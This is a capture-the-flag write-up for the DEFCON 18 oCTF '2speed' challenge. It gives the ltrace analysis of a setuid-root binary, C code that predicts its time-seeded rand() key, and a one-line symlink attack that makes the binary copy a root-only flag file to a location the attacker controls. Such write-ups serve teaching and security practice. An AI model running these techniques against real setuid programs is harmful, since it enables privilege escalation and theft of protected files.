# TubeWarriors DEFCON 18 oCTF "2speed" challenge ## Challenge description and overview of solution A complete write-up on the 2speed challenge's local root vulnerability exploitation is documented in [DC18-oCTF-2speed-local-root](/DC18-oCTF-2speed-local-root). The **2speed** (setuid root) binary generates a random value seeded by the current time and then compares that value (hex-encoded) to the first command line argument provided upon running the binary. If they match, it copies the first 33 bytes of a file called **flag.txt** in the current directory (in particular, **/home/2speed/flag.txt** - which contained the challenge's flag data and was owned by root with no group/world permissions) into a file in **/tmp** constructed with this time-seeded rand() output. By running the **2speed** binary with the proper argument, one can then immediately read the flag contents in the random file generated in /tmp/. ### Investigative steps **ltrace** was used to investigate 2speed's behavior. Example output follows: ``` jvoss@ASLinLt40:dc18 $ltrace ./2speed 1234 __libc_start_main(0x8048574, 2, 0xff8b85f4, 0x8048740, 0x8048730 <unfinished ...> time(NULL) = 1280700730 srand(0x4c55f13a, 1, 2181, 0xf776b7a8, 0x76b4c8) = 0 rand(0x76b4c8, 0, 0, 0, 0) = 0x18efae73 sprintf("18efae73", "%08x", 0x18efae73) = 8 strcmp("18efae73", "1234") = 1 +++ exited (status 0) +++ ``` It was possible then to deduce that the program is simply doing: ```c time_t i = time(NULL); srand(i); int ra = rand(); printf("%08x\n", ra); ``` ### Solution A simple C program was created which output this time seeded random value as a hex-encoded string. It could then be used as follows to satisfy the challenge application: ``` ./2speed $(./2speeder ) ``` Below is the *2speeder* C program code, it is quite simple: ```c #include <time.h> int main(int argc, char **argv) { time_t cur_time = time(NULL); srand(cur_time); int ra = rand(); printf("%08x\n", ra); return 0; } ``` At that point we were able to grab 2speed's flag using a simple symlink attack. Our random number generating binary was placed in **/dev/shm/..../2speeder**: ### Solution automation This solution could be automated in the following fashion, and executed remotely if desired. ``` export ourkey=$(/dev/shm/..../2speeder); ln -s /dev/shm/..../ok2.txt /tmp/flag.tmp.$ourkey; /home/twospeed/2speed $ourkey; cat /dev/shm/..../ok2.txt ``` This reliably produced the key contents in **/dev/shm/..../ok2.txt** ---- CategoryWhitepapers